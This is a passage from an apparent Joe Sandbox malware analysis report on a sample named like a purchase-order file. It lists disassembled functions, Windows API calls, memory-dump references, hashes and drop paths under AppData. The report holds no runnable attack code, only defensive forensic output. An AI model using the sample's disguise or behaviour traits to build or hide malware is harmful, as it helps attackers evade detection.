                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                      • Instruction ID: bce073d95cda9f80ae5a70f3258e8641f0ad27ed80faf677ac8523eeabb20274
                                                                      • Opcode Fuzzy Hash: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                      • Instruction Fuzzy Hash: F7B09235585200AAEA224B40DD09F457A62A7A4701F008064B210240F0CAB200A0DB19
                                                                      Function 004030A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,000089E4), ref: 004030B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                      Function 00403F13 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403CF0), ref: 00403F1D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                      • Instruction ID: 7c635d8461ea366e4ce50998120561f43c0f0a4d26a99d582f7a8baadb7aa675
                                                                      • Opcode Fuzzy Hash: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                      • Instruction Fuzzy Hash: 98A00176808101EBCB029B50FE08D4ABF62ABA4709B12D426E25594174D6365871FF2A
                                                                      Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 6ef222803d68d34d2b98f7333693f5778702576746e8508d9016a81179eb72e8
                                                                      • Instruction ID: 792a8355e77204e71b52dac9cb8dd8af6eaf68ea71b947aa0f734c6da66c5308
                                                                      • Opcode Fuzzy Hash: 6ef222803d68d34d2b98f7333693f5778702576746e8508d9016a81179eb72e8
                                                                      • Instruction Fuzzy Hash: 9AD0C777B145404BD750E7B87E8545A6399F7513253204D33D502F1091D678C9059A29
                                                                      Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                      • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                      • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                      • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                                      Non-executed Functions

                                                                      Function 004048A2 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004048BA
                                                                      • GetDlgItem.USER32(?,00000408), ref: 004048C5
                                                                      • GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040490F
                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404922
                                                                      • SetWindowLongA.USER32(?,000000FC,00404E99), ref: 0040493B
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040494F
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404961
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404977
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404983
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404995
                                                                      • DeleteObject.GDI32(00000000), ref: 00404998
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049C3
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049CF
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A64
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A8F
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AA3
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404AD2
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AE0
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404AF1
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BEE
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C53
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C68
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C8C
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CAC
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404CC1
                                                                      • GlobalFree.KERNEL32(?), ref: 00404CD1
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D4A
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404DF3
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E02
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E22
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404E70
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404E7B
                                                                      • ShowWindow.USER32(00000000), ref: 00404E82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 4be3ebb239eb5df190ca789ef438fd3f359f8d4e72245769c592d36fe31c7233
                                                                      • Instruction ID: 76d2e208bb82396193868b8099a6daa05122b73eb358a4a137ee08f8801950ae
                                                                      • Opcode Fuzzy Hash: 4be3ebb239eb5df190ca789ef438fd3f359f8d4e72245769c592d36fe31c7233
                                                                      • Instruction Fuzzy Hash: F1026CB0900209AFEB14DF94DD85AAE7BB9FB84314F10813AF610BA2E1D7789D51CF58
                                                                      Function 0040432F Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 004043A8
                                                                      • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404464
                                                                      • lstrcmpiA.KERNEL32(Call,0079E540), ref: 00404496
                                                                      • lstrcatA.KERNEL32(?,Call), ref: 004044A2
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4
                                                                        • Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9
                                                                        • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                        • Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                        • Part of subcall function 00405F77: CharNextA.USER32(?,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                        • Part of subcall function 00405F77: CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                      • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D
                                                                        • Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                        • Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
                                                                        • Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: @y$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$Call
                                                                      • API String ID: 2624150263-735047468
                                                                      • Opcode ID: dc4fe7cf9e1a75852f8a478e9657d204a566c4560be991004467591f2bc4fc9b
                                                                      • Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
                                                                      • Opcode Fuzzy Hash: dc4fe7cf9e1a75852f8a478e9657d204a566c4560be991004467591f2bc4fc9b
                                                                      • Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69
                                                                      Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 0040211D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                      • API String ID: 123533781-1484825760
                                                                      • Opcode ID: 9070b07f5c49c3eba4a055dbb4da1717ebb68c024122170813a0f181913405a8
                                                                      • Instruction ID: 14d4926e91d078e82bebccc5f6ab74bc99395aff19d04a9878b07c190defc42e
                                                                      • Opcode Fuzzy Hash: 9070b07f5c49c3eba4a055dbb4da1717ebb68c024122170813a0f181913405a8
                                                                      • Instruction Fuzzy Hash: 9D513871A00208BFDB10DFA4C988A9DBBB5FF48318F20856AF515EB2D1DB799941CB54
                                                                      Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: d3616940253a6c47e3692c4c08840169220b4dbfcc92f4ed15c26e48d9ac8dbb
                                                                      • Instruction ID: 693c9160ce4d260d62fecbf2f45a0834f3a8ccba4a644e55fc62545b2e120305
                                                                      • Opcode Fuzzy Hash: d3616940253a6c47e3692c4c08840169220b4dbfcc92f4ed15c26e48d9ac8dbb
                                                                      • Instruction Fuzzy Hash: F9F0A0335081509FE701E7B49949AEEB778EF61324F60457BF241B21C1D7B84A84AA3A
                                                                      Function 0040403A Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 004040D9
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
                                                                      • GetSysColor.USER32(?), ref: 00404108
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
                                                                      • lstrlenA.KERNEL32(?), ref: 00404129
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040414D
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004041AF
                                                                      • SendMessageA.USER32(00000000), ref: 004041B2
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041DD
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
                                                                      • SetCursor.USER32(00000000), ref: 00404235
                                                                      • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404255
                                                                      • SetCursor.USER32(00000000), ref: 00404258
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: Call$N$open
                                                                      • API String ID: 3615053054-2563687911
                                                                      • Opcode ID: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                      • Instruction ID: 325d301b2710361d9817967eb08788495a0e15e312a989604f50e6602a626d4c
                                                                      • Opcode Fuzzy Hash: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                      • Instruction Fuzzy Hash: 9161C671A40209BFEB109F60DC45F6A7B69FB84744F10816AFB05BA2D1C7BCA951CF98
                                                                      Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
